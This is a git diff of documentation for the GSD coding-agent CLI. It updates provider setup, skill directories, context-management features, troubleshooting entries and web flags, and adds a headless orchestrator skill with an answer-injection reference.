+**Cause:** Most local inference servers don't support the OpenAI `developer` message role. + +**Fix:** Add `compat.supportsDeveloperRole: false` to the provider config. This makes GSD send `system` messages instead: + +```json +{ + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + } +} +``` + +### `stream_options` error with local models + +**Cause:** Some servers don't support `stream_options: { include_usage: true }`. + +**Fix:** Add `compat.supportsUsageInStreaming: false`: + +```json +{ + "compat": { + "supportsUsageInStreaming": false + } +} +``` + +### "apiKey is required" validation error + +**Cause:** `models.json` schema requires `apiKey` when `models` are defined. 
+ +**Fix:** For local servers that don't need auth, set a dummy value: + +```json +"apiKey": "not-needed" +``` + +### Cost shows $0.00 for custom models + +**Expected behavior.** GSD defaults cost to zero for custom models. Override with the `cost` field if you want accurate cost tracking: + +```json +"cost": { "input": 0.15, "output": 0.60, "cacheRead": 0.015, "cacheWrite": 0.19 } +``` + +Values are per million tokens. + +--- + +## Verifying Your Setup + +After configuring a provider: + +1. **Launch GSD:** + ```bash + gsd + ``` + +2. **Check available models:** + ``` + /model + ``` + Your provider's models should appear in the list. + +3. **Switch to the model:** + Select it from the `/model` picker. + +4. **Send a test message:** + Type anything to confirm the model responds. + +If the model doesn't appear, check: +- The environment variable is set in the current shell +- `models.json` is valid JSON (use `cat ~/.gsd/agent/models.json | python3 -m json.tool`) +- The server is running (for local providers) + +For additional help, see [Troubleshooting](./troubleshooting.md) or run `/gsd doctor` inside a session. diff --git a/docs/remote-questions.md b/docs/remote-questions.md index 8e4ce3555..8078a9c56 100644 --- a/docs/remote-questions.md +++ b/docs/remote-questions.md @@ -16,7 +16,7 @@ The setup wizard: 3. Lists servers the bot belongs to (or lets you pick) 4. Lists text channels in the selected server 5. Sends a test message to confirm permissions -6. Saves the configuration to `~/.gsd/preferences.md` +6. 
Saves the configuration to `~/.gsd/PREFERENCES.md` **Bot requirements:** - A Discord bot application with a token (from [Discord Developer Portal](https://discord.com/developers/applications)) @@ -65,7 +65,7 @@ The setup wizard: ## Configuration -Remote questions are configured in `~/.gsd/preferences.md`: +Remote questions are configured in `~/.gsd/PREFERENCES.md`: ```yaml remote_questions: diff --git a/docs/skills.md b/docs/skills.md index 71f039546..6a9e1d567 100644 --- a/docs/skills.md +++ b/docs/skills.md @@ -2,28 +2,85 @@ Skills are specialized instruction sets that GSD loads when the task matches. They provide domain-specific guidance for the LLM — coding patterns, framework idioms, testing strategies, and tool usage. -## Bundled Skills +Skills follow the open [Agent Skills standard](https://agentskills.io/) and are **not GSD-specific** — they work with Claude Code, OpenAI Codex, Cursor, GitHub Copilot, Windsurf, and 40+ other agents. -GSD ships with these skills, installed to `~/.gsd/agent/skills/`: +## Skill Directories -| Skill | Trigger | Description | -|-------|---------|-------------| -| `frontend-design` | Web UI work — components, pages, dashboards, styling | Production-grade frontend with high design quality | -| `swiftui` | macOS/iOS apps — SwiftUI, Xcode, App Store | Full lifecycle from creation to shipping | -| `debug-like-expert` | Complex debugging — after standard approaches fail | Methodical investigation with evidence gathering | -| `rust-core` | Rust code — ownership, lifetimes, traits, async | Idiomatic, safe, performant Rust patterns | -| `axum-web-framework` | Axum web apps — routing, middleware, extractors | Complete Axum development guide | -| `axum-tests` | Testing Axum apps — integration tests, mock state | Test patterns for Axum applications | -| `tauri` | Tauri v2 desktop apps — setup, plugins, bundling | Cross-platform desktop app development | -| `tauri-ipc-developer` | Tauri IPC — React-Rust type-safe communication | Command 
scaffolding and serialization | -| `tauri-devtools` | Tauri debugging — CrabNebula DevTools integration | Profiling and monitoring | -| `github-workflows` | GitHub Actions — CI/CD, workflow debugging | Live syntax, run monitoring, failure diagnosis | -| `security-audit` | Security auditing — dependency scanning, OWASP | Comprehensive security assessment | -| `security-review` | Code security review — injection, XSS, auth flaws | Vulnerability-focused code review | -| `security-docker` | Docker security — Dockerfile, runtime hardening | Container security best practices | -| `review` | Code review — staged changes, PRs, security, performance | Diff-aware code review with quality analysis | -| `test` | Test generation and execution — auto-detects frameworks | Generate tests or run existing suites with failure analysis | -| `lint` | Linting and formatting — ESLint, Biome, Prettier | Auto-detect linter, fix issues, report remaining problems | +GSD reads skills from two locations, in priority order: + +| Location | Scope | Description | +|-----------------------------------|---------|----------------------------------------------------------| +| `~/.agents/skills/` | Global | Shared across all projects and all compatible agents | +| `.agents/skills/` (project root) | Project | Project-specific skills, committable to version control | + +Global skills take precedence over project skills when names collide. + +> **Migration from `~/.gsd/agent/skills/`:** On first launch after upgrading, GSD automatically copies skills from the legacy `~/.gsd/agent/skills/` directory to `~/.agents/skills/`. The old directory is preserved for backward compatibility. 
+ +## Installing Skills + +Skills are installed via the [skills.sh CLI](https://skills.sh): + +```bash +# Interactive — choose skills and target agents +npx skills add dpearson2699/swift-ios-skills + +# Install specific skills non-interactively +npx skills add dpearson2699/swift-ios-skills --skill swift-concurrency --skill swiftui-patterns -y + +# Install all skills from a repo +npx skills add dpearson2699/swift-ios-skills --all + +# Check for updates +npx skills check + +# Update installed skills +npx skills update +``` + +### Onboarding Catalog + +During `gsd init`, GSD detects the project's tech stack and recommends relevant skill packs. For brownfield projects, detection is automatic; for greenfield projects, the user picks a tech stack. + +The curated catalog is maintained in `src/resources/extensions/gsd/skill-catalog.ts`. Each entry maps a tech stack to a skills.sh repo and specific skill names. + +#### Available Skill Packs + +**Swift (any Swift project — `Package.swift` or `.xcodeproj` detected):** +- **SwiftUI** — layout, navigation, animations, gestures, Liquid Glass +- **Swift Core** — Swift language, concurrency, Codable, Charts, Testing, SwiftData + +**iOS (only when `.xcodeproj` targets `iphoneos` via SDKROOT):** +- **iOS App Frameworks** — App Intents, Widgets, StoreKit, MapKit, Live Activities +- **iOS Data Frameworks** — CloudKit, HealthKit, MusicKit, WeatherKit, Contacts +- **iOS AI & ML** — Core ML, Vision, on-device AI, speech recognition +- **iOS Engineering** — networking, security, accessibility, localization, Instruments +- **iOS Hardware** — Bluetooth, CoreMotion, NFC, PencilKit, RealityKit +- **iOS Platform** — CallKit, EnergyKit, HomeKit, SharePlay, PermissionKit + +**Web:** +- **React & Web Frontend** — React best practices, web design, composition patterns +- **React Native** — cross-platform mobile patterns +- **Frontend Design & UX** — frontend design, accessibility + +**Languages:** +- **Rust** — Rust patterns and best practices +- 
**Python** — Python patterns and best practices +- **Go** — Go patterns and best practices + +**General:** +- **Document Handling** — PDF, DOCX, XLSX, PPTX creation and manipulation + +### Maintaining the Catalog + +The skill catalog lives in [`src/resources/extensions/gsd/skill-catalog.ts`](../src/resources/extensions/gsd/skill-catalog.ts). To add or update a pack: + +1. Add a `SkillPack` entry to the `SKILL_CATALOG` array with `repo`, `skills`, and matching criteria +2. For language-detection matching, use `matchLanguages` (values from `detection.ts` `LANGUAGE_MAP`) +3. For Xcode platform matching, use `matchXcodePlatforms` (e.g., `["iphoneos"]` — parsed from `SDKROOT` in `project.pbxproj`) +4. For file-presence matching, use `matchFiles` (checked against `PROJECT_FILES` in `detection.ts`) +5. If the pack should appear in greenfield choices, add it to `GREENFIELD_STACKS` +6. Packs sharing the same `repo` are batched into a single `npx skills add` invocation ## Skill Discovery @@ -59,18 +116,18 @@ skill_rules: ### Resolution Order Skills can be referenced by: -1. **Bare name** — e.g., `frontend-design` → scans `~/.gsd/agent/skills/` and project skills -2. **Absolute path** — e.g., `/Users/you/.gsd/agent/skills/my-skill/SKILL.md` +1. **Bare name** — e.g., `frontend-design` → scans `~/.agents/skills/` and project `.agents/skills/` +2. **Absolute path** — e.g., `/Users/you/.agents/skills/my-skill/SKILL.md` 3. **Directory path** — e.g., `~/custom-skills/my-skill` → looks for `SKILL.md` inside -User skills (`~/.gsd/agent/skills/`) take precedence over project skills. +Global skills (`~/.agents/skills/`) take precedence over project skills (`.agents/skills/`). 
## Custom Skills Create your own skills by adding a directory with a `SKILL.md` file: ``` -~/.gsd/agent/skills/my-skill/ +~/.agents/skills/my-skill/ SKILL.md — instructions for the LLM references/ — optional reference files ``` @@ -82,10 +139,12 @@ The `SKILL.md` file contains instructions the LLM follows when the skill is acti Place skills in your project for project-specific guidance: ``` -.gsd/agent/skills/my-project-skill/ +.agents/skills/my-project-skill/ SKILL.md ``` +Project-local skills can be committed to version control so team members share the same skill set. + ## Skill Lifecycle Management GSD tracks skill performance across auto-mode sessions and surfaces health data to help you maintain skill quality. diff --git a/docs/token-optimization.md b/docs/token-optimization.md index a622869d1..4a3a423af 100644 --- a/docs/token-optimization.md +++ b/docs/token-optimization.md @@ -257,20 +257,64 @@ models: ## How the Pieces Fit Together ``` -preferences.md +PREFERENCES.md └─ token_profile: balanced ├─ resolveProfileDefaults() → model defaults + phase skip defaults ├─ resolveInlineLevel() → standard │ └─ prompt builders gate context inclusion by level - └─ classifyUnitComplexity() → routes to execution/execution_simple model - ├─ task plan analysis (steps, files, signals) - ├─ unit type defaults - ├─ budget pressure adjustment - └─ adaptive learning from routing-history.json + ├─ classifyUnitComplexity() → routes to execution/execution_simple model + │ ├─ task plan analysis (steps, files, signals) + │ ├─ unit type defaults + │ ├─ budget pressure adjustment + │ ├─ adaptive learning from routing-history.json + │ └─ capability scoring (when capability_routing: true) + │ └─ 7-dimension model profiles × task requirement vectors + └─ context_management + ├─ observation masking (before_provider_request hook) + ├─ tool result truncation (tool_result_max_chars) + └─ phase handoff anchors (injected into prompt builders) ``` The profile is resolved once and flows through 
the entire dispatch pipeline. Explicit preferences override profile defaults at every layer.
+
+## Observation Masking
+
+*Introduced in v2.59.0*
+
+During auto-mode sessions, tool results accumulate in the conversation history and consume context window space. Observation masking replaces tool result content older than N user turns with a lightweight placeholder before each LLM call. This reduces token usage with zero LLM overhead — no summarization calls, no latency.
+
+Masking is enabled by default during auto-mode. Configure via preferences:
+
+```yaml
+context_management:
+  observation_masking: true # default: true (set false to disable)
+  observation_mask_turns: 8 # keep results from last 8 user turns (range: 1-50)
+  tool_result_max_chars: 800 # truncate individual tool results beyond this length
+```
+
+### How It Works
+
+1. Before each provider request, the `before_provider_request` hook inspects the messages array
+2. Tool results (`toolResult`, `bashExecution`) older than the configured turn threshold are replaced with `[result masked — within summarized history]`
+3. Recent tool results (within the keep window) are preserved in full
+4. All assistant and user messages are always preserved — only tool result content is masked
+
+This pairs with the existing compaction system: masking reduces context pressure between compactions, and compaction handles the full context reset when the window fills.
+
+### Tool Result Truncation
+
+Individual tool results that exceed `tool_result_max_chars` (default: 800) are truncated with a `…[truncated]` marker. This prevents a single large tool output from dominating the context window.
+
+## Phase Handoff Anchors
+
+*Introduced in v2.59.0*
+
+When auto-mode transitions between phases (research → planning → execution), structured JSON anchors are written to `.gsd/milestones/<milestone-id>/anchors/<phase>.json`.
Downstream prompt builders inject these anchors so the next phase inherits intent, decisions, blockers, and next steps without re-inferring from artifact files.
+
+This reduces context drift — a common agent failure mode in which the agent loses track of prior decisions across phase boundaries.
+
+Anchors are written automatically after successful completion of `research-milestone`, `research-slice`, `plan-milestone`, and `plan-slice` units. No configuration needed.
+
 ## Prompt Compression
 
 *Introduced in v2.29.0*
diff --git a/docs/troubleshooting.md b/docs/troubleshooting.md
index 977a7881a..875bba7fc 100644
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -97,6 +97,8 @@ models:
 **Headless mode:** `gsd headless auto` auto-restarts the entire process on crash (default 3 attempts with exponential backoff). Combined with provider error auto-resume, this enables true overnight unattended execution.
 
+For common provider setup issues (role errors, streaming errors, model ID mismatches), see the [Provider Setup Guide — Common Pitfalls](./providers.md#common-pitfalls).
+
 ### Budget ceiling reached
 
 **Symptoms:** Auto mode pauses with "Budget ceiling reached."
@@ -151,6 +153,38 @@ rm -rf "$(dirname .gsd)/.gsd.lock"
 - If the error persists, close tools that may be holding the file open and then retry.
 - If repeated failures continue, run `/gsd doctor` to confirm the repo state is still healthy and report the exact path + error code.
 
+### Node v24 web boot failure
+
+**Symptoms:** `gsd --web` fails with `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on Node v24.
+
+**Cause:** Node v24 changed type-stripping behavior for `node_modules`, breaking the Next.js web build.
+
+**Fix:** Fixed in v2.42.0+ (#1864). Upgrade to the latest version.
+
+### Orphan web server process
+
+**Symptoms:** `gsd --web` fails because port 3000 is already in use, even though no GSD session is running.
+
+**Cause:** A previous web server process was not cleaned up on exit.
+ +**Fix:** Fixed in v2.42.0+. GSD now cleans up stale web server processes automatically. If you're on an older version, kill the orphan process manually: `lsof -ti:3000 | xargs kill`. + +### Non-JS project blocked by worktree health check + +**Symptoms:** Worktree health check fails or blocks auto-mode in projects that don't use Node.js (e.g., Rust, Go, Python). + +**Cause:** The worktree health check only recognized JavaScript ecosystems prior to v2.42.0. + +**Fix:** Fixed in v2.42.0+ (#1860). The health check now supports 17+ ecosystems. Upgrade to the latest version. + +### German/non-English locale git errors + +**Symptoms:** Git commands fail or produce unexpected results when the system locale is non-English (e.g., German). + +**Cause:** GSD parsed git output assuming English locale strings. + +**Fix:** Fixed in v2.42.0+. All git commands now force `LC_ALL=C` to ensure consistent English output regardless of system locale. + ## MCP Client Issues ### `mcp_servers` shows no configured servers @@ -278,6 +312,16 @@ Doctor rebuilds `STATE.md` from plan and roadmap files on disk and fixes detecte - **Forensics:** `/gsd forensics` for structured post-mortem analysis of auto-mode failures - **Session logs:** `.gsd/activity/` contains JSONL session dumps for crash forensics +## iTerm2-Specific Issues + +### Ctrl+Alt shortcuts trigger the wrong action (e.g., Ctrl+Alt+G opens external editor instead of GSD dashboard) + +**Symptoms:** Pressing Ctrl+Alt+G opens the external editor prompt (Ctrl+G) instead of the GSD dashboard. Other Ctrl+Alt shortcuts behave as their Ctrl-only counterparts. + +**Cause:** iTerm2's default Left Option Key setting is "Normal", which swallows the Alt modifier for Ctrl+Alt key combinations. The terminal receives only the Ctrl key, so Ctrl+Alt+G arrives as Ctrl+G. + +**Fix:** In iTerm2, go to **Profiles → Keys → General** and set **Left Option Key** to **Esc+**. 
This makes Alt/Option send an escape prefix that terminal applications can detect, enabling Ctrl+Alt shortcuts to work correctly. + ## Windows-Specific Issues ### LSP returns ENOENT on Windows (MSYS2/Git Bash) @@ -339,3 +383,33 @@ This shows which servers are active and, if none are found, diagnoses why — in | Go | `go install golang.org/x/tools/gopls@latest` | After installing, run `lsp reload` to restart detection without restarting GSD. + +## Notifications + +### Notifications not appearing on macOS + +**Symptoms:** `notifications.enabled: true` in preferences, but no desktop notifications appear during auto-mode (no milestone complete alerts, no budget warnings, no error notifications). No error messages logged. + +**Cause:** GSD uses `osascript display notification` as a fallback on macOS. This command is attributed to your terminal app (Ghostty, iTerm2, Alacritty, Kitty, Warp, etc.). If that app doesn't have notification permissions in System Settings → Notifications, macOS silently drops the notification — `osascript` exits 0 with no error. + +Most terminal apps don't appear in the Notifications settings panel until they've successfully delivered at least one notification, creating a chicken-and-egg problem. + +**Fix (recommended):** Install `terminal-notifier`, which registers as its own Notification Center app: + +```bash +brew install terminal-notifier +``` + +GSD automatically prefers `terminal-notifier` when available. On first use, macOS will prompt you to allow notifications — this is the expected behavior. + +**Fix (alternative):** Go to **System Settings → Notifications** and enable notifications for your terminal app. If your terminal doesn't appear in the list, try sending a test notification from Terminal.app first to register "Script Editor": + +```bash +osascript -e 'display notification "test" with title "GSD"' +``` + +**Verify:** After applying either fix, test with: + +```bash +terminal-notifier -title "GSD" -message "working!" 
-sound Glass +``` diff --git a/docs/web-interface.md b/docs/web-interface.md index ab2ee0ad1..2b55bfccf 100644 --- a/docs/web-interface.md +++ b/docs/web-interface.md @@ -7,16 +7,29 @@ GSD includes a browser-based web interface for project management, real-time pro ## Quick Start ```bash -pi --web +gsd --web ``` This starts a local web server and opens the GSD dashboard in your default browser. +### CLI Flags (v2.42.0) + +```bash +gsd --web --host 0.0.0.0 --port 8080 --allowed-origins "https://example.com" +``` + +| Flag | Default | Description | +|------|---------|-------------| +| `--host` | `localhost` | Bind address for the web server | +| `--port` | `3000` | Port for the web server | +| `--allowed-origins` | (none) | Comma-separated list of allowed CORS origins | + ## Features - **Project management** — view milestones, slices, and tasks in a visual dashboard - **Real-time progress** — server-sent events push status updates as auto-mode executes - **Multi-project support** — manage multiple projects from a single browser tab via `?project=` URL parameter +- **Change project root** — switch project directories from the web UI without restarting the server (v2.44) - **Onboarding flow** — API key setup and provider configuration through the browser - **Model selection** — switch models and providers from the web UI @@ -31,7 +44,7 @@ Key components: ## Configuration -The web server binds to `localhost` by default. No additional configuration is required. +The web server binds to `localhost:3000` by default. Use `--host`, `--port`, and `--allowed-origins` to override (see CLI Flags above). ### Environment Variables @@ -39,6 +52,14 @@ The web server binds to `localhost` by default. 
No additional configuration is r |----------|-------------| | `GSD_WEB_PROJECT_CWD` | Default project path when `?project=` is not specified | +## Node v24 Compatibility + +Node v24 introduced breaking changes to type stripping that caused `ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING` on web boot. This is fixed in v2.42.0+ (#1864). If you encounter this error, upgrade GSD. + +## Auth Token Persistence + +As of v2.42.0, the web UI persists the auth token in `sessionStorage` so it survives page refreshes (#1877). Previously, refreshing the page required re-authentication. + ## Platform Notes - **Windows**: The web build is skipped on Windows due to Next.js webpack EPERM issues with system directories. The CLI remains fully functional. diff --git a/docs/what-is-pi/09-the-customization-stack.md b/docs/what-is-pi/09-the-customization-stack.md index 10a3fb42d..10d032b39 100644 --- a/docs/what-is-pi/09-the-customization-stack.md +++ b/docs/what-is-pi/09-the-customization-stack.md @@ -48,8 +48,8 @@ On-demand capability packages following the [Agent Skills standard](https://agen ``` **Placement:** -- `~/.gsd/agent/skills/` or `~/.agents/skills/` (global) -- `.gsd/skills/` or `.agents/skills/` (project, searched up to git root) +- `~/.agents/skills/` (global — shared across all agents) +- `.agents/skills/` (project, searched up to git root) **Skill structure:** ``` diff --git a/docs/what-is-pi/15-pi-packages-the-ecosystem.md b/docs/what-is-pi/15-pi-packages-the-ecosystem.md index 4e19de60a..7116cca99 100644 --- a/docs/what-is-pi/15-pi-packages-the-ecosystem.md +++ b/docs/what-is-pi/15-pi-packages-the-ecosystem.md @@ -38,6 +38,6 @@ Or just use conventional directory names (`extensions/`, `skills/`, `prompts/`, - [Package gallery](https://shittycodingagent.ai/packages) - [npm search](https://www.npmjs.com/search?q=keywords%3Api-package) -- [Discord community](https://discord.com/invite/3cU7Bz4UPx) +- [Discord community](https://discord.com/invite/nKXTsAcmbT) --- diff --git 
a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md index fa6b09ad0..8b195117a 100644 --- a/docs/what-is-pi/18-quick-reference-commands-shortcuts.md +++ b/docs/what-is-pi/18-quick-reference-commands-shortcuts.md @@ -40,6 +40,8 @@ | Alt+Enter (during streaming) | Queue follow-up message | | Alt+Up | Retrieve queued messages | +> **iTerm2 users:** Ctrl+Alt shortcuts (e.g., Ctrl+Alt+G for the GSD dashboard) require Left Option Key set to "Esc+" in Profiles → Keys → General. The default "Normal" setting swallows the Alt modifier. + ### CLI ```bash diff --git a/docs/working-in-teams.md b/docs/working-in-teams.md index 71956d5ff..fd5476813 100644 --- a/docs/working-in-teams.md +++ b/docs/working-in-teams.md @@ -9,7 +9,7 @@ GSD supports multi-user workflows where several developers work on the same repo The simplest way to configure GSD for team use is to set `mode: team` in your project preferences. This enables unique milestone IDs, push branches, and pre-merge checks in one setting: ```yaml -# .gsd/preferences.md (project-level, committed to git) +# .gsd/PREFERENCES.md (project-level, committed to git) --- version: 1 mode: team @@ -38,7 +38,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime ``` **What gets shared** (committed to git): -- `.gsd/preferences.md` — project preferences +- `.gsd/PREFERENCES.md` — project preferences - `.gsd/PROJECT.md` — living project description - `.gsd/REQUIREMENTS.md` — requirement contract - `.gsd/DECISIONS.md` — architectural decisions @@ -50,7 +50,7 @@ Share planning artifacts (milestones, roadmaps, decisions) while keeping runtime ### 3. Commit the Preferences ```bash -git add .gsd/preferences.md +git add .gsd/PREFERENCES.md git commit -m "chore: enable GSD team workflow" ``` @@ -71,7 +71,7 @@ If you have an existing project with `.gsd/` blanket-ignored: 1. Ensure no milestones are in progress (clean state) 2. 
Update `.gitignore` to use the selective pattern above -3. Add `unique_milestone_ids: true` to `.gsd/preferences.md` +3. Add `unique_milestone_ids: true` to `.gsd/PREFERENCES.md` 4. Optionally rename existing milestones to use unique IDs: ``` I have turned on unique milestone ids, please update all old milestone diff --git a/gsd-orchestrator/SKILL.md b/gsd-orchestrator/SKILL.md new file mode 100644 index 000000000..ad423afdf --- /dev/null +++ b/gsd-orchestrator/SKILL.md @@ -0,0 +1,215 @@ +--- +name: gsd-orchestrator +description: > + Build software products autonomously via GSD headless mode. Handles the full + lifecycle: write a spec, launch a build, poll for completion, handle blockers, + track costs, and verify the result. Use when asked to "build something", + "create a project", "run gsd", "check build status", or any task that + requires autonomous software development via subprocess. +metadata: + openclaw: + requires: + bins: [gsd] + install: + kind: node + package: gsd-pi + bins: [gsd] +--- + + +You are an autonomous agent that builds software by orchestrating GSD as a subprocess. +GSD is a headless CLI that plans, codes, tests, and ships software from a spec. +You control it via shell commands, exit codes, and JSON output — no SDK, no RPC. + + + +GSD headless is a subprocess you launch and monitor. Think of it like a junior developer +you hand a spec to: + +1. You write the spec (what to build) +2. You launch the build (`gsd headless ... new-milestone --context spec.md --auto`) +3. You wait for it to finish (exit code tells you the outcome) +4. You check the result (query state, inspect files, verify deliverables) +5. If blocked, you intervene (steer, supply answers, or escalate) + +The subprocess handles all planning, coding, testing, and git commits internally. +You never write application code yourself — GSD does that. + + + +- **Flags before command.** `gsd headless [--flags] [command] [args]`. Flags after the command are ignored. 
+- **Redirect stderr.** JSON output goes to stdout. Progress goes to stderr. Always `2>/dev/null` when parsing JSON. +- **Check exit codes.** 0=success, 1=error, 10=blocked (needs you), 11=cancelled. +- **Use `query` to poll.** Instant (~50ms), no LLM cost. Use it between steps, not `auto` for status. +- **Budget awareness.** Track `cost.total` from query results. Set limits before launching long runs. +- **One project directory per build.** Each GSD project needs its own directory with a `.gsd/` folder. + + + +Route based on what you need to do: + +**Build something from scratch:** +Read `workflows/build-from-spec.md` — write spec, init directory, launch, monitor, verify. + +**Check on a running or completed build:** +Read `workflows/monitor-and-poll.md` — query state, interpret phases, handle blockers. + +**Execute with fine-grained control:** +Read `workflows/step-by-step.md` — run one unit at a time with decision points. + +**Understand the JSON output:** +Read `references/json-result.md` — field reference for HeadlessJsonResult. + +**Pre-supply answers or secrets:** +Read `references/answer-injection.md` — answer file schema and injection mechanism. + +**Look up a specific command:** +Read `references/commands.md` — full command reference with flags and examples. + + + + +**Launch a full build (spec to working code):** +```bash +mkdir -p /tmp/my-project && cd /tmp/my-project && git init +cat > spec.md << 'EOF' +# Your Product Spec Here +Build a ... 
+EOF +gsd headless --output-format json --context spec.md new-milestone --auto 2>/dev/null +``` + +**Check project state (instant, free):** +```bash +cd /path/to/project +gsd headless query | jq '{phase: .state.phase, progress: .state.progress, cost: .cost.total}' +``` + +**Resume work on an existing project:** +```bash +cd /path/to/project +gsd headless --output-format json auto 2>/dev/null +``` + +**Run one step at a time:** +```bash +RESULT=$(gsd headless --output-format json next 2>/dev/null) +echo "$RESULT" | jq '{status: .status, phase: .phase, cost: .cost.total}' +``` + + + + +| Code | Meaning | Your action | +|------|---------|-------------| +| `0` | Success | Check deliverables, verify output, report completion | +| `1` | Error or timeout | Inspect stderr, check `.gsd/STATE.md`, retry or escalate | +| `10` | Blocked | Query state for blocker details, steer around it or escalate to human | +| `11` | Cancelled | Process was interrupted — resume with `--resume ` or restart | + + + +GSD creates and manages all state in `.gsd/`: +``` +.gsd/ + PROJECT.md # What this project is + REQUIREMENTS.md # Capability contract + DECISIONS.md # Architectural decisions (append-only) + KNOWLEDGE.md # Persistent project knowledge (patterns, rules, lessons) + STATE.md # Current phase and next action + milestones/ + M001-xxxxx/ + M001-xxxxx-CONTEXT.md # Scope, constraints, assumptions + M001-xxxxx-ROADMAP.md # Slices with checkboxes + M001-xxxxx-SUMMARY.md # Completion summary + slices/S01/ + S01-PLAN.md # Tasks + S01-SUMMARY.md # Slice summary + tasks/ + T01-PLAN.md # Individual task spec + T01-SUMMARY.md # Task completion summary +``` + +State is derived from files on disk — checkboxes in ROADMAP.md and PLAN.md are the source of truth for completion. You never need to edit these files. GSD manages them. But you can read them to understand progress. 
+
+
+
+| Flag | Description |
+|------|-------------|
+| `--output-format <format>` | `text` (default), `json` (structured result at exit), `stream-json` (JSONL events) |
+| `--json` | Alias for `--output-format stream-json` — JSONL event stream to stdout |
+| `--bare` | Skip CLAUDE.md, AGENTS.md, user settings, user skills. Use for CI/ecosystem runs. |
+| `--resume <session-id>` | Resume a prior headless session by its session ID |
+| `--timeout N` | Overall timeout in ms (default: 300000, use 0 to disable) |
+| `--model ID` | Override LLM model |
+| `--supervised` | Forward interactive UI requests to orchestrator via stdout/stdin |
+| `--response-timeout N` | Timeout (ms) for orchestrator response in supervised mode (default: 30000) |
+| `--answers <file>` | Pre-supply answers and secrets from JSON file |
+| `--events <types>` | Filter JSONL to specific event types (comma-separated, implies `--json`) |
+| `--verbose` | Show tool calls in progress output |
+| `--context <file>` | Spec file path for `new-milestone` (use `-` for stdin) |
+| `--context-text <text>` | Inline spec text for `new-milestone` |
+| `--auto` | Chain into auto-mode after `new-milestone` |
+
+
+
+Pre-supply answers and secrets for fully autonomous runs:
+
+```bash
+gsd headless --answers answers.json --output-format json auto 2>/dev/null
+```
+
+```json
+{
+  "questions": { "question_id": "selected_option" },
+  "secrets": { "API_KEY": "sk-..." },
+  "defaults": { "strategy": "first_option" }
+}
+```
+
+- **questions** — question ID to answer (string for single-select, string[] for multi-select)
+- **secrets** — env var to value, injected into child process environment
+- **defaults.strategy** — `"first_option"` (default) or `"cancel"` for unmatched questions
+
+See `references/answer-injection.md` for the full mechanism.
+
+
+
+For real-time monitoring, use JSONL event streaming:
+
+```bash
+gsd headless --json auto 2>/dev/null | while read -r line; do
+  TYPE=$(echo "$line" | jq -r '.type')
+  case "$TYPE" in
+    tool_execution_start) echo "Tool: $(echo "$line" | jq -r '.toolName')" ;;
+    extension_ui_request) echo "GSD: $(echo "$line" | jq -r '.message // .title // empty')" ;;
+    agent_end) echo "Session ended" ;;
+  esac
+done
+```
+
+Filter to specific events: `--events agent_end,execution_complete,extension_ui_request`
+
+Available types: `agent_start`, `agent_end`, `tool_execution_start`, `tool_execution_end`,
+`tool_execution_update`, `extension_ui_request`, `message_start`, `message_end`,
+`message_update`, `turn_start`, `turn_end`, `cost_update`, `execution_complete`.
+
+
+
+| Command | Purpose |
+|---------|---------|
+| `auto` | Run all queued units until milestone complete or blocked (default) |
+| `next` | Run exactly one unit, then exit |
+| `query` | Instant JSON snapshot — state, next dispatch, costs (no LLM, ~50ms) |
+| `new-milestone` | Create milestone from spec file |
+| `dispatch <phase>` | Force specific phase (research, plan, execute, complete, reassess, uat, replan) |
+| `stop` / `pause` | Control auto-mode |
+| `steer <text>` | Hard-steer plan mid-execution |
+| `skip` / `undo` | Unit control |
+| `queue` | Queue/reorder milestones |
+| `history` | View execution history |
+| `doctor` | Health check + auto-fix |
+| `knowledge <text>` | Add persistent project knowledge |
+
+See `references/commands.md` for the complete reference.
+
diff --git a/gsd-orchestrator/references/answer-injection.md b/gsd-orchestrator/references/answer-injection.md
new file mode 100644
index 000000000..369a3828b
--- /dev/null
+++ b/gsd-orchestrator/references/answer-injection.md
@@ -0,0 +1,119 @@
+# Answer Injection
+
+Pre-supply answers and secrets to eliminate interactive prompts during headless execution.
+
+## Usage
+
+```bash
+gsd headless --answers answers.json auto
+gsd headless --answers answers.json new-milestone --context spec.md --auto
+```
+
+The `--answers` flag takes a path to a JSON file containing pre-supplied answers and secrets.
+
+## Answer File Schema
+
+```json
+{
+  "questions": {
+    "question_id": "selected_option_label",
+    "multi_select_question": ["option_a", "option_b"]
+  },
+  "secrets": {
+    "API_KEY": "sk-...",
+    "DATABASE_URL": "postgres://..."
+  },
+  "defaults": {
+    "strategy": "first_option"
+  }
+}
+```
+
+### Fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `questions` | `Record<string, string \| string[]>` | Map question ID → answer. String for single-select, string array for multi-select. |
+| `secrets` | `Record<string, string>` | Map env var name → value. Injected into child process environment variables. |
+| `defaults.strategy` | `"first_option" \| "cancel"` | Fallback for unmatched questions. Default: `"first_option"`. |
+
+## How Secrets Work
+
+Secrets are injected as environment variables into the GSD child process:
+
+1. The orchestrator passes the answer file via `--answers`
+2. GSD reads the file and sets secret values as env vars in the child process
+3. When `secure_env_collect` runs inside the agent, it finds the keys already in `process.env`
+4. The tool skips the interactive prompt and reports the keys as "already configured"
+
+Secrets are never logged or included in event streams.
+
+## How Question Matching Works
+
+Two-phase correlation:
+
+1. **Observe** — GSD monitors `tool_execution_start` events for `ask_user_questions` to extract question metadata (ID, options, allowMultiple)
+2. **Match** — Subsequent `extension_ui_request` events are correlated to the metadata and responded to with the pre-supplied answer
+
+Handles out-of-order events (extension_ui_request can arrive before tool_execution_start) via a deferred processing queue with 500ms timeout.
